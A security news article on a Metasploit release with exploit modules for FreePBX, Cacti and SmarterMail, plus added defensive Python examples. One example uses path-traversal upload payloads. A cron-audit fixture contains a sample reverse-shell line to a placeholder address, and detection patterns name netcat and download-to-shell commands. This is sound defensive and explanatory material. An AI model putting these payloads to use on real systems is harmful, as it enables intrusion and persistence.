Metasploit Expands Toolkit with New Modules Targeting FreePBX, Cacti, SmarterMail Vulnerabilities

Metasploit Enhances Security Arsenal with Seven New Modules Targeting FreePBX, Cacti, and SmarterMail

The latest Metasploit Framework release adds seven new modules: four exploits, one auxiliary module, and two post-exploitation persistence modules. The exploits target widely used enterprise software, including FreePBX, Cacti, and SmarterMail, and several of them show how an authentication bypass or an unauthenticated upload turns into a full system compromise.

FreePBX Vulnerability Chaining

A notable part of this release is a set of three modules for FreePBX, the open-source web interface for managing Asterisk PBX systems. Researchers Noah King and msutovsky-r7 chained multiple vulnerabilities so that an attacker who starts with no credentials ends with remote code execution (RCE).

The chain begins with CVE-2025-66039, an authentication bypass that lets an unauthenticated attacker reach functionality normally protected by the login. From there, two routes lead to RCE:

1. SQL Injection Exploit (CVE-2025-61675): The injection lets the attacker insert rows into the `cron_job` table, so the application's own scheduler runs an attacker-chosen command.

2. Unrestricted File Upload (CVE-2025-61678): The firmware upload function does not restrict what is uploaded, so the attacker writes a webshell to the server and executes commands through it.

An auxiliary module uses the same SQL injection to create rogue administrator accounts instead, showing that the injection is useful beyond the RCE chain.

Critical RCE in Cacti and SmarterMail

Beyond the VoIP sector, the release adds exploits for severe vulnerabilities in monitoring and communication platforms:

– Cacti (CVE-2025-24367): Affects versions prior to 1.2.29. An authenticated user can abuse the graph template mechanism to achieve remote code execution on the server. Given Cacti's widespread use in infrastructure monitoring, upgrading to 1.2.29 or later should be a priority for network administrators.

– SmarterMail (CVE-2025-52691): An unauthenticated file upload in which a path traversal in the `guid` parameter controls where the uploaded file lands. The module chooses its payload by the target's operating system:

– Windows: Deploys a webshell in the webroot directory.

– Linux: Achieves persistence and execution by creating a cron job in `/etc/cron.d`.
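The traversal pattern behind the SmarterMail module, shown as an added illustration that is not SmarterMail's or Metasploit's code: a hypothetical upload handler joins a client-supplied `guid` straight into a filesystem path, beside a hardened version of the same operation. The directory `/srv/mail/uploads`, the two payload strings, and the function names are assumptions for the demonstration; the real SmarterMail layout and endpoint are not described on this page.

```python
import os
import re

# Assumed upload directory for the demonstration (not SmarterMail's real layout).
UPLOAD_ROOT = "/srv/mail/uploads"

# Canonical 8-4-4-4-12 hex form; anything else is rejected before touching the filesystem.
UUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}")


def vulnerable_upload_path(guid: str, filename: str) -> str:
    """Hypothetical vulnerable handler: the client-supplied guid is joined
    directly into the path, so '../' segments walk out of UPLOAD_ROOT."""
    return os.path.normpath(os.path.join(UPLOAD_ROOT, guid, filename))


def hardened_upload_path(guid: str, filename: str) -> str:
    """Same operation with three defences: allow-list the identifier syntax,
    reject separators in the file name, and verify containment after
    the path has been normalised."""
    if not UUID_RE.fullmatch(guid.lower()):
        raise ValueError("guid is not a canonical UUID")
    if not filename or filename in (".", "..") or "/" in filename or "\\" in filename:
        raise ValueError("illegal file name")
    root = os.path.realpath(UPLOAD_ROOT)
    candidate = os.path.realpath(os.path.join(root, guid, filename))
    # commonpath is the containment check; a plain string-prefix test would
    # accept /srv/mail/uploads-evil as being "under" /srv/mail/uploads.
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("path escapes upload root")
    return candidate


def escapes_root(path: str) -> bool:
    """True when a computed path lies outside UPLOAD_ROOT."""
    root = os.path.normpath(UPLOAD_ROOT)
    return os.path.commonpath([root, os.path.normpath(path)]) != root


if __name__ == "__main__":
    # Constructed payloads mirroring the two outcomes the module is described as
    # reaching: a file in the web root (Windows) or a file in /etc/cron.d (Linux).
    for guid, name in [("../wwwroot", "shell.aspx"), ("../../../etc/cron.d", "update")]:
        p = vulnerable_upload_path(guid, name)
        print(f"vulnerable: {p}  escapes={escapes_root(p)}")
        try:
            hardened_upload_path(guid, name)
        except ValueError as err:
            print(f"hardened rejects {guid!r}: {err}")
    print("hardened accepts:", hardened_upload_path("3f2504e0-4f89-11d3-9a0c-0305e82c3301", "attachment.bin"))
```

The identifier allow-list alone would already stop both payloads; the containment check is kept because it also catches bugs introduced later elsewhere in the path construction, and `realpath` resolves symlinks that a `normpath`-only check would miss.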

Enhancements in Persistence Tools and Core Fixes

The release also introduces improvements in post-exploitation capabilities:

– Burp Suite Extension Persistence Module: Installs a malicious extension in Burp Suite Pro or Community; the payload runs each time the user launches the application.

– Unified SSH Key Persistence Module: Consolidates Windows and Linux SSH key persistence into a single module, streamlining operations.

Additionally, critical bugs have been addressed:

– Hash Data Formatting Issue: Resolved to ensure compatibility with the John the Ripper password cracker.

– SSH Login Scanner Logic Error: Fixed to accurately report successful logins, even when sessions could not be opened.

Module Overview

The following table summarizes the new modules introduced:

| Module Name | CVE ID(s) | Target System | Impact |
|---|---|---|---|
| FreePBX Endpoint SQLi | CVE-2025-66039, CVE-2025-61675 | FreePBX | Remote Code Execution |
| FreePBX Firmware Upload | CVE-2025-66039, CVE-2025-61678 | FreePBX | Remote Code Execution |
| Cacti Graph Template RCE | CVE-2025-24367 | Cacti | Remote Code Execution |
| SmarterMail File Upload | CVE-2025-52691 | SmarterMail | Remote Code Execution |

Implications and Recommendations

Once an exploit module is public, attacking an unpatched system is a matter of running it, so administrators should:

– Apply Patches Promptly: Update FreePBX, SmarterMail, and Cacti (1.2.29 or later) to the vendors' fixed releases.

– Conduct Regular Security Assessments: Use tools like Metasploit against your own systems to confirm that patches took effect and that only the intended services are exposed.

– Monitor System Logs and Artifacts: Watch for the traces these modules leave: new files in `/etc/cron.d`, unexpected rows in the FreePBX `cron_job` table, administrator accounts nobody created, and new files in the web root.
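A defensive counterpart to the persistence artefact described above (the `/etc/cron.d` file the SmarterMail module drops on Linux, and more generally any scheduler entry an attacker can write), as an added example that is neither from this page nor from Metasploit: a small audit that parses cron.d-style files and flags entries with reverse-shell or download-and-execute patterns. The three file bodies are constructed samples; the pattern list, the every-minute heuristic, and the function names are assumptions of mine, not indicators published for these CVEs.

```python
import re
from dataclasses import dataclass

# Constructed sample contents of three files as they might sit in /etc/cron.d.
# The first two imitate benign distro jobs; the third is a made-up malicious entry.
SAMPLE_CRON_D = {
    "sysstat": (
        "# Activity reports every 10 minutes everyday\n"
        "5-55/10 * * * * root command -v debian-sa1 > /dev/null && debian-sa1 1 1\n"
    ),
    "certbot": (
        "SHELL=/bin/sh\n"
        "0 */12 * * * root test -x /usr/bin/certbot && certbot -q renew\n"
    ),
    "x9f2k": (
        "* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/203.0.113.5/4444 0>&1'\n"
    ),
}

# Assumed heuristics: command fragments that rarely belong in a legitimate system job.
SUSPICIOUS = {
    "reverse shell via /dev/tcp": re.compile(r"/dev/tcp/"),
    "interactive bash": re.compile(r"\bbash\s+-i\b"),
    "netcat with -e": re.compile(r"\b(?:nc|ncat|netcat)\b[^|;]*\s-e\b"),
    "download piped to shell": re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba|z|da)?sh\b"),
    "base64 decode": re.compile(r"\bbase64\s+(?:-d|--decode)\b"),
}

# /etc/cron.d lines carry a user field between the schedule and the command:
# either five schedule fields or an @keyword, then the user, then the command.
CRON_LINE = re.compile(r"^(@\w+\s+|(?:\S+\s+){5})(\S+)\s+(.*)$")


@dataclass
class Finding:
    file: str
    user: str
    command: str
    reasons: list


def audit_cron_d(files: dict) -> list:
    """Return one Finding per cron.d entry that matches at least one heuristic."""
    findings = []
    for name, body in files.items():
        for raw in body.splitlines():
            line = raw.strip()
            if not line or line.startswith("#"):
                continue
            if re.match(r"^\w+=", line):
                continue  # environment assignment such as SHELL=/bin/sh
            m = CRON_LINE.match(line)
            if not m:
                continue
            schedule, user, command = m.group(1).strip(), m.group(2), m.group(3)
            reasons = [why for why, pat in SUSPICIOUS.items() if pat.search(command)]
            if schedule == "* * * * *":
                reasons.append("runs every minute")
            if reasons and user == "root":
                reasons.append("runs as root")
            if reasons:
                findings.append(Finding(name, user, command, reasons))
    return findings


if __name__ == "__main__":
    for f in audit_cron_d(SAMPLE_CRON_D):
        print(f"{f.file}: user={f.user} {'; '.join(f.reasons)}\n    {f.command}")
```

On a real host, read the directory with `os.listdir("/etc/cron.d")` and feed each file's contents into `audit_cron_d`; comparing the file list against a known-good baseline catches a dropped file even when its command matches none of the patterns. The same idea applies to database-backed schedulers such as the FreePBX `cron_job` table, though the column layout is not described here.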

By staying vigilant and implementing these practices, organizations can significantly reduce the risk of exploitation and enhance their overall security posture.